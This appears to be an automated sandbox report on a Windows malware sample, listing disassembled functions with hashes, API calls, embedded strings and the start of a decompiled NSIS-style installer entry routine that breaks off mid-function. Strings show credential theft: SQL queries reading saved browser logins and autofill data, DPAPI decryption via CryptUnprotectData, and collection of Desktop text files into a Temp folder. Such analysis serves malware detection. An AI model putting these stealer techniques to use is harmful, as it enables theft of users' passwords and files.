Instruction Fuzzy Hash: 38F16F75E002199FDF14CFA9C8806AEBBB1FF99314F15866ED825AB380D735AD01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00401470, Relevance: 3.2, APIs: 2, Instructions: 156encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004015C1
LocalFree.KERNEL32(?,?,00000000), ref: 004015EE

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 2881b9e91a5d987511e5f2ac682aaebebb87b69d0b3152ea17ccf3e184eb1107
Instruction ID: e7e37e47200a5f4c4208d31e4d22155f223a14f8f05cf4adce5e65b59585c62a
Opcode Fuzzy Hash: 2881b9e91a5d987511e5f2ac682aaebebb87b69d0b3152ea17ccf3e184eb1107
Instruction Fuzzy Hash: 235158759043055BC712DE36DC81B57B798AFA3344F444B2EF84476282F736E5898762

Uniqueness

Uniqueness Score: -1.00%

Function 0048D0F0, Relevance: 2.0, Strings: 1, Instructions: 712COMMON

Download Yara Rule

Strings

Expression tree is too large (maximum depth %d), xrefs: 0048D925

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Expression tree is too large (maximum depth %d)
API String ID: 0-1961352115
Opcode ID: d9d358050b879ab5a919bcd7b5f280b4aed31e75027f6c185d58e6ae2eabbb79
Instruction ID: 871fc25d4611c20eea6bc90e1ce23f34bae4c29fb7a5b3bd152d5094791dc713
Opcode Fuzzy Hash: d9d358050b879ab5a919bcd7b5f280b4aed31e75027f6c185d58e6ae2eabbb79
Instruction Fuzzy Hash: 33526C71A053058FC714EF19C480A2FB7E2BF88714F148A2EE9859B391E779ED45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0E0, Relevance: 1.8, Strings: 1, Instructions: 532COMMON

Download Yara Rule

Strings

%02x, xrefs: 0040E5DF, 0040E65C

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %02x
API String ID: 0-560843007
Opcode ID: 7f90fd2f7967b5f18de236f62200f3f53cfb8c01ec81c514bee099548185f5d1
Instruction ID: 0beb70879a228c81938f6ce98ea0df61829cf59f1d2718ed1a17c2ea3bdb3d98
Opcode Fuzzy Hash: 7f90fd2f7967b5f18de236f62200f3f53cfb8c01ec81c514bee099548185f5d1
Instruction Fuzzy Hash: 120278715082414FCB25CF3994906BBBBD6AF96308F084DBED8C56B382D63A991AC749

Uniqueness

Uniqueness Score: -1.00%

Function 004BE2ED, Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004BE2E8,?,?,00000008,?,?,004BDF80,00000000), ref: 004BE51A

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: fd9abdac45427a48c62186b8e61dd5fc019fa7d9756e23a24cfad6c97c6311aa
Instruction ID: 4ff08c104dbbb71ebb7af5c5b8c4ad07f936e5b27b76de167334e825e1a1a17b
Opcode Fuzzy Hash: fd9abdac45427a48c62186b8e61dd5fc019fa7d9756e23a24cfad6c97c6311aa
Instruction Fuzzy Hash: F1B14C31610605DFD724CF29C486AE57BE0FF85368F298659E899CF3A1C339E982CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004A80BB, Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

0, xrefs: 004A8253

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e7635bf23ec3317dfd308baf71f20176fe1fee8e97d7cf6c0b19d54ba7c88f7c
Instruction ID: e98538404ebfac02f762e23d3b0368841511ea21a53dbc98d83a422c0a271f2a
Opcode Fuzzy Hash: e7635bf23ec3317dfd308baf71f20176fe1fee8e97d7cf6c0b19d54ba7c88f7c
Instruction Fuzzy Hash: AC616A716006086ADF389A694892BBF73A4EB77704F54082FE442DB381DF6D9D43874E

Uniqueness

Uniqueness Score: -1.00%

Function 004072F0, Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

gj, xrefs: 0040749A

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 3c1eb4632b2f74d5f5bc7bc80234d312146dde69e11d6a339bd8768915384dde
Instruction ID: 07bdf16eebfdc7fb42b0a0ec5ccce347574d7fc020e715ed053b28df43995c9a
Opcode Fuzzy Hash: 3c1eb4632b2f74d5f5bc7bc80234d312146dde69e11d6a339bd8768915384dde
Instruction Fuzzy Hash: FF6116651096D6AEC706CF7984505A9FFB07F66101B08829AE8D48BB43C324E769DBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00423440, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f001db8d01257f545a3db67ec07b6a03fc39edd29bbaf6ac72ff3362d4283de
Instruction ID: ba4b2cbdb9a07c6e89f538cfe8efc89d246e75e51b2526d70c6300842a572e6e
Opcode Fuzzy Hash: 1f001db8d01257f545a3db67ec07b6a03fc39edd29bbaf6ac72ff3362d4283de
Instruction Fuzzy Hash: 4F91ADB07052229FDB20CF19E480666FBF4FF45705B98C5AED8588B311D73AEA16CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0044D060, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2103461a8ad0d1e901e7c9e576e05e9df2f8ae9ce449e0dccf48d05d280ed5f8
Instruction ID: be6417fdbfee3600a9d2880c94f15119b3f40b00fb07337c720a3051068dfb66
Opcode Fuzzy Hash: 2103461a8ad0d1e901e7c9e576e05e9df2f8ae9ce449e0dccf48d05d280ed5f8
Instruction Fuzzy Hash: C881C171A013168FE724DF69C480A26B7E1BF84314F0940AFEC458B356E779ED46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00406550, Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43d14958bd18dd8afb11095f498afddff82a6fe4587ebfd3d313c31fc9cdcbf
Instruction ID: 9aa0a29a0a6fff557015a4591ab27c6afc2088f4fc77ad43ddbad9aaa0fc894e
Opcode Fuzzy Hash: b43d14958bd18dd8afb11095f498afddff82a6fe4587ebfd3d313c31fc9cdcbf
Instruction Fuzzy Hash: 2E71FA5440C3D16FDB428B3940712EBBFE48E9F344F9A699EE4C88B643D129C10EEB52

Uniqueness

Uniqueness Score: -1.00%

Function 004AC3BD, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a58efb6bfe0a03ed7c5ce56338e247b58c7461813853aa48d290cc9e5b91b35
Instruction ID: 8c4e83e04c9b15e6fc1fba33e5e7a9b0208b33bb1b9f3ea9d40a2c756c520755
Opcode Fuzzy Hash: 6a58efb6bfe0a03ed7c5ce56338e247b58c7461813853aa48d290cc9e5b91b35
Instruction Fuzzy Hash: 46517F71E00119AFDF44CF99C990AEEBBB2EF99304F198059E815AB341C738AE51DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00407150, Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 769c8af99aefed6de093fedfcb07106183e27163cf542577afd049a634c44f67
Instruction ID: 04ab7fe831b2d17e8e346924097eed752d7c2464ddbaf0cfe0e8af2eb53537cc
Opcode Fuzzy Hash: 769c8af99aefed6de093fedfcb07106183e27163cf542577afd049a634c44f67
Instruction Fuzzy Hash: A3511871A083158FD754CF2DD88059ABBE2FFC8214F058A2EF898E7341D738E9558B96

Uniqueness

Uniqueness Score: -1.00%

Function 004BC37E, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8462199ea2200cd92216fb3c9b84bc8b9b0aaf3cc3f58e94250ba47fa5f591cf
Instruction ID: e5034e032495fc3547397d7cf558a6f3cd4981536b8c1b35ff17e78942df38b4
Opcode Fuzzy Hash: 8462199ea2200cd92216fb3c9b84bc8b9b0aaf3cc3f58e94250ba47fa5f591cf
Instruction Fuzzy Hash: 5021B373F204394B7B0CC47E8C522BDB6E1C68C601745823AE8A6EA3C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 004BC25E, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97ce266003ba773e6591d144dbc70996cb1840b4a24e1b02c0f176ad0ffced35
Instruction ID: f5315f823bf69c0af0209d549af598430774b2468556161de823588a92c40497
Opcode Fuzzy Hash: 97ce266003ba773e6591d144dbc70996cb1840b4a24e1b02c0f176ad0ffced35
Instruction Fuzzy Hash: A4117723F30C255A675C81A98C172BA95D2DBD825070F537BD826E7284E9A4DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 0041E1F0, Relevance: 24.9, APIs: 6, Strings: 8, Instructions: 398COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041E4DC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041E51E
__allrem.LIBCMT ref: 0041E529
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041E5FC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041E658
__allrem.LIBCMT ref: 0041E663

Strings

string or blob too big, xrefs: 0041E72F
%03d, xrefs: 0041E565
W, xrefs: 0041E4E9
%02d, xrefs: 0041E3E9, 0041E516
%.16g, xrefs: 0041E5AC
%lld, xrefs: 0041E60B
%04d, xrefs: 0041E698
%06.3f, xrefs: 0041E43C

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W$string or blob too big
API String ID: 632788072-3927112599
Opcode ID: 7ea6cdd59b97cb629d921a68e3bed5448647d237916c5be5c692fe2a54c93429
Instruction ID: 18952ff50af2ff602864913f74ad0a992ae47bb8305cbdbeb54ea8e701713736
Opcode Fuzzy Hash: 7ea6cdd59b97cb629d921a68e3bed5448647d237916c5be5c692fe2a54c93429
Instruction Fuzzy Hash: 2BE156395083409BD721CF19C801BEBB7E5AF95304F044A1EFCE567392D73AE886879A

Uniqueness

Uniqueness Score: -1.00%

Function 004032F0, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 191COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040335C

Strings

%s --==> , xrefs: 0040354E
SELECT name, value, value_lower FROM autofill, xrefs: 004034D9
%Temp%\, xrefs: 00403313, 004033F2
%s, xrefs: 0040355D, 0040359E
%s -=> , xrefs: 0040358F
\files_\forms.txt, xrefs: 00403402
\_Files\_AllForms_list.txt, xrefs: 00403328

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: %Temp%\$%s$%s --==> $%s -=> $SELECT name, value, value_lower FROM autofill$\_Files\_AllForms_list.txt$\files_\forms.txt
API String ID: 237503144-3183437486
Opcode ID: 80bfb0a9ddb6ce558b51defa05ac392b840719bf5f2b0455101a77bc7aa286b3
Instruction ID: 615a9abf4cbb149e270314c8fdf24507e93d2d5f603ea041c1f94f389a37bbc3
Opcode Fuzzy Hash: 80bfb0a9ddb6ce558b51defa05ac392b840719bf5f2b0455101a77bc7aa286b3
Instruction Fuzzy Hash: C8514771E00204ABDB04AB65DD46F9F7A79AB45309F10413EF404772D2EA7DAF048BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403347, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 214COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 0040335C
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 00403430

Strings

%s --==> , xrefs: 0040354E
SELECT name, value, value_lower FROM autofill, xrefs: 004034D9
%Temp%\, xrefs: 004033F2
%s, xrefs: 0040355D, 0040359E
%s -=> , xrefs: 0040358F
\files_\forms.txt, xrefs: 00403402

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: %Temp%\$%s$%s --==> $%s -=> $SELECT name, value, value_lower FROM autofill$\files_\forms.txt
API String ID: 237503144-2454345778
Opcode ID: c31c85e681bc0f296a47392b76f92f194b14d3b0347baa6fafd7396b6e37f349
Instruction ID: 5514c028f0a69312dd4d201d653bca1e112c0da43ae5affd85a4b6216f1ad6e2
Opcode Fuzzy Hash: c31c85e681bc0f296a47392b76f92f194b14d3b0347baa6fafd7396b6e37f349
Instruction Fuzzy Hash: 77612771E001056BDB04AB64DD86F9F762AAF45309F10413EF500B73E2EA7DAB448BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401650, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 97COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004016BF

Strings

\_Files\_AllPasswords_list.txt, xrefs: 0040168B
%Temp%\, xrefs: 0040167B, 00401755
SELECT origin_url, username_value, password_value FROM logins, xrefs: 0040183C
\files_\passwords.txt, xrefs: 00401765

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: %Temp%\$SELECT origin_url, username_value, password_value FROM logins$\_Files\_AllPasswords_list.txt$\files_\passwords.txt
API String ID: 237503144-2490482078
Opcode ID: cec8f464c77410e3ae61bcafc6a11bf36e577dda2ea9ce2cbf2a73b5ac833ca9
Instruction ID: b1e04c8118d12f8fba775ff0435bf77311858b436e99ad06027b7ca1664d2ade
Opcode Fuzzy Hash: cec8f464c77410e3ae61bcafc6a11bf36e577dda2ea9ce2cbf2a73b5ac833ca9
Instruction Fuzzy Hash: 1F31C574E10208ABDB00DF94EE85F9EB7B5EB45314F20827EE415732D0E7796E058B99

Uniqueness

Uniqueness Score: -1.00%

Function 00417460, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%USERPROFILE%\Desktop\*.txt,?,00000208,00000000,00000000,00000000,004C02F0,000000FF,?,?,?), ref: 0041749B
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000208), ref: 004174E0

Strings

%Temp%\, xrefs: 004167DE, 00416F43, 004174A2, 00418C5D, 0041944D
\files_\files, xrefs: 004174B2
%USERPROFILE%\Desktop\*.txt, xrefs: 00417496

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: %Temp%\$%USERPROFILE%\Desktop\*.txt$\files_\files
API String ID: 237503144-2716849472
Opcode ID: 208c279a789e6d6ad9d0f7f4c0eea264d3a7a6d6d19e069bba9ed1826cb2a98a
Instruction ID: 3895132bf9906a5310a4e3e3116b76a1a968bfb30c94068e7c15111ceffd21a4
Opcode Fuzzy Hash: 208c279a789e6d6ad9d0f7f4c0eea264d3a7a6d6d19e069bba9ed1826cb2a98a
Instruction Fuzzy Hash: 0531E374900205DACB14EF68CD49BDFB7B6FF44308F10419EE80567681DB79AA86CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004AF283, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004AF278,?,?,004AF240,?,?,?), ref: 004AF298
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004AF2AB
FreeLibrary.KERNEL32(00000000,?,?,004AF278,?,?,004AF240,?,?,?), ref: 004AF2CE

Strings

CorExitProcess, xrefs: 004AF2A3
mscoree.dll, xrefs: 004AF291

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a977ceea25ed0cb1f910bcf6c7219639f96fb4c963200aed1fdd370e00fc6e24
Instruction ID: e24f9a0c0964617970fd016566d2bfb817e34f999ddd756d0389ddbf0b4d3823
Opcode Fuzzy Hash: a977ceea25ed0cb1f910bcf6c7219639f96fb4c963200aed1fdd370e00fc6e24
Instruction Fuzzy Hash: CEF08239500219FBDB619B90DD09F9E7A78EB01756F1440B6E400A22A0DBB98E01DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004220C0, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 497COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004224E1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042253A

Strings

0, xrefs: 004221C2
., xrefs: 004222E4

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: .$0
API String ID: 885266447-446915570
Opcode ID: 56de9388f1a948502b938aa42cf865c3733b0cdad6545e3834d8a89a4073f05d
Instruction ID: e033ce31a19cbf79d56d967a4997a013684bdceb6abff1c08bc6c6ee4e387678
Opcode Fuzzy Hash: 56de9388f1a948502b938aa42cf865c3733b0cdad6545e3834d8a89a4073f05d
Instruction Fuzzy Hash: 30024971B083719BC718CE28AA9033AB7E1BBD5304F984A6FE4855B391D7F88945C74E

Uniqueness

Uniqueness Score: -1.00%

Function 004AF355, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe, xrefs: 004AF393, 004AF39A, 004AF3CE

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.24453.exe
API String ID: 0-571641359
Opcode ID: 7cad8d0292f6e00e9cd089009182aa48c289bd1f4648145222b1035356b0c455
Instruction ID: 17ff09f74920e3804233c793901d938e5abcf1309fd6f38378984023c539c273
Opcode Fuzzy Hash: 7cad8d0292f6e00e9cd089009182aa48c289bd1f4648145222b1035356b0c455
Instruction Fuzzy Hash: CF31B071A00214EBCB21DFDAC8859AFBBF8EBAA314B10007BE400D7310D7789E44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004B2199, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 004B2220

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 722d52db25787e60e73d56931fd61c60b52a48383c98d70e56efca5b8bd2946c
Instruction ID: 78af3be2defae5fd809bacf94bfae55f24b08bce3526bbe092afe59cfcf642f3
Opcode Fuzzy Hash: 722d52db25787e60e73d56931fd61c60b52a48383c98d70e56efca5b8bd2946c
Instruction Fuzzy Hash: 16B143329002569FDB15CF28C9817EEBBE5EF56300F1481ABE855EB341D2BC8902CB79

Uniqueness

Uniqueness Score: -1.00%

Function 004BD133, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004BCBC6,00000000,00000001,00000000,00000000,?,004B8CA2,00000000,00000020,00000000), ref: 004BD14A
GetLastError.KERNEL32(?,004BCBC6,00000000,00000001,00000000,00000000,?,004B8CA2,00000000,00000020,00000000,00000000,00000000,?,004B91F7,00000000), ref: 004BD156

Part of subcall function 004BD11C: CloseHandle.KERNEL32(FFFFFFFE,004BD166,?,004BCBC6,00000000,00000001,00000000,00000000,?,004B8CA2,00000000,00000020,00000000,00000000,00000000), ref: 004BD12C

___initconout.LIBCMT ref: 004BD166

Part of subcall function 004BD0DE: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004BD10D,004BCBB3,00000000,?,004B8CA2,00000000,00000020,00000000,00000000), ref: 004BD0F1

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,004BCBC6,00000000,00000001,00000000,00000000,?,004B8CA2,00000000,00000020,00000000,00000000), ref: 004BD17B

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 98ca9aae693c18bdb5f4b5b1bc2fe9391be13850717556658d4bfcce0c77a53b
Instruction ID: 9c777f703eee673faa37b95d544c1c5e7333c1d239de4be3617dd41eda223f3a
Opcode Fuzzy Hash: 98ca9aae693c18bdb5f4b5b1bc2fe9391be13850717556658d4bfcce0c77a53b
Instruction Fuzzy Hash: 70F03736401115BBCF622FD6DC08DDA7F26FF09360F044076FE09C5231DA3688209B99

Uniqueness

Uniqueness Score: -1.00%

Function 00408610, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 281COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0040862A

Part of subcall function 004A9940: _free.LIBCMT ref: 004A9953

Strings

OCTET STRING, xrefs: 004086D3, 00408753, 00408833
INTEGER, xrefs: 004088A3

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __alloca_probe_16_free
String ID: INTEGER$OCTET STRING
API String ID: 99459268-1512152260
Opcode ID: 0903a8d4eec19986388920c3fc8f9255342ba64837ac4b833e3c850f02d4b8ea
Instruction ID: 1d78921071b063ed05f56bce8f9d03b8fb798b419423b52ee646704dbcf880e4
Opcode Fuzzy Hash: 0903a8d4eec19986388920c3fc8f9255342ba64837ac4b833e3c850f02d4b8ea
Instruction Fuzzy Hash: 359168729400045BDB10DB20CD91BFB776AAB12308F5845BED985B72C2EE3AEE49C759

Uniqueness

Uniqueness Score: -1.00%

Function 004A430D, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004A4332

Strings

RCC, xrefs: 004A434C
MOC, xrefs: 004A4344

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 9ed82726573f14e7d260a405f06863fb75eaf27579e63f5f3b608b568a77a2bc
Instruction ID: 77f01a37920bbb0ae2503cc33368504d1b19901411ed8268f362473aa578ab26
Opcode Fuzzy Hash: 9ed82726573f14e7d260a405f06863fb75eaf27579e63f5f3b608b568a77a2bc
Instruction Fuzzy Hash: 1F416A72A00209AFCF15CF98CD81AEEBBB5FF99304F18815AF90467211D379AA51DB54

Uniqueness

Uniqueness Score: -1.00%

Function 004B6200, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,004B6472,?,00000000,004A60CF,004A60CF,00000000,?,?), ref: 004B622B
GetACP.KERNEL32(00000000,004B6472,?,00000000,004A60CF,004A60CF,00000000,?,?), ref: 004B6242

Strings

rdK, xrefs: 004B6208, 004B6265

Memory Dump Source

Source File: 00000000.00000002.382370325.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: rdK
API String ID: 0-1219187607
Opcode ID: 447b75073d558d76fbc935fbed722856e748c08aaf7da91d6a2424ba80902605
Instruction ID: db68047074edef78067a90af4af702bf0dc08fbe4122e7e0503aa1dac346e708
Opcode Fuzzy Hash: 447b75073d558d76fbc935fbed722856e748c08aaf7da91d6a2424ba80902605
Instruction Fuzzy Hash: C6F0C870500100CFEB14EB59D8187A93771AB51338F198396E524861E2C77D8885CF5E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Murano.exe PID: 5520 Parent PID: 5964 Murano.exeCOMMON

Executed Functions

Function 004038AF, Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

C-Code - Quality: 84%

			_entry_() {
				struct _SHFILEINFOW _v700;
				struct _SECURITY_ATTRIBUTES* _v716;
				struct _SECURITY_ATTRIBUTES* _v720;
				WCHAR* _v724;
				char _v736;
				signed int _v740;
				signed int _v744;
				struct _SECURITY_ATTRIBUTES* _v748;
				intOrPtr _v752;
				int _v756;
				intOrPtr _v760;
				struct _SECURITY_ATTRIBUTES* _v764;
				void* _v772;
				int _t34;
				short* _t42;
				signed int _t45;
				WCHAR* _t47;
				WCHAR* _t49;
				void* _t54;
				intOrPtr _t56;
				signed int _t58;
				void* _t73;
				int _t79;
				WCHAR* _t83;
				WCHAR* _t92;
				void* _t99;
				signed int _t100;
				signed int _t101;
				void* _t102;
				WCHAR* _t103;
				void* _t104;
				void* _t106;
				WCHAR* _t107;
				void* _t108;
				WCHAR* _t109;
				WCHAR* _t112;
				WCHAR* _t114;
				void* _t117;
				void* _t118;

				_t117 =  &_v724;
				_t108 = 0x20;
				_v716 = 0;
				_v724 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v720 = 0;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x47eb98 = _t34;
				 *0x47eab0 = E00406328(8);
				SHGetFileInfoW(0x40a264, 0,  &_v700, 0x2b4, 0); // executed
				E00406035(0x476aa0, L"NSIS Error");
				E00406035(0x4cf0a0, GetCommandLineW());
				 *0x47eab8 = GetModuleHandleW(0);
				_t42 = 0x4cf0a0;
				if( *0x4cf0a0 == 0x22) {
					_t108 = 0x22;
					_t42 = 0x4cf0a2;
				}
				_t109 = CharNextW(E00405D32(_t42, _t108));
				_v744 = _t109;
				while(1) {
					_t45 =  *_t109 & 0x0000ffff;
					_t120 = _t45;
					if(_t45 == 0) {
						break;
					}
					_t102 = 0x20;
					__eflags = _t45 - _t102;
					if(_t45 != _t102) {
						L5:
						__eflags =  *_t109 - 0x22;
						if( *_t109 == 0x22) {
							_t109 =  &(_t109[1]);
							__eflags = _t109;
							_t102 = 0x22;
						}
						__eflags =  *_t109 - 0x2f;
						if( *_t109 != 0x2f) {
							L17:
							_t109 = E00405D32(_t109, _t102);
							__eflags =  *_t109 - 0x22;
							if(__eflags == 0) {
								_t109 =  &(_t109[1]);
								__eflags = _t109;
							}
							continue;
						}
						_t109 =  &(_t109[1]);
						__eflags =  *_t109 - 0x53;
						if( *_t109 != 0x53) {
							L12:
							_t47 = E0040382C(_t109, L"NCRC", 4);
							_t118 = _t117 + 0xc;
							__eflags = _t47;
							if(_t47 != 0) {
								L16:
								_t12 = _t109 - 4; // -6
								_t49 = E0040382C(_t12, L" /D=", 4);
								_t117 = _t118 + 0xc;
								__eflags = _t49;
								if(_t49 == 0) {
									_t13 = _t109 - 4; // -6
									E0040824C(_t13, 0, 8);
									_t117 = _t117 + 0xc;
									__eflags =  &(_t109[2]);
									E00406035(0x4d30a8,  &(_t109[2]));
									break;
								}
								goto L17;
							}
							_t100 = _t109[4] & 0x0000ffff;
							__eflags = _t100 - 0x20;
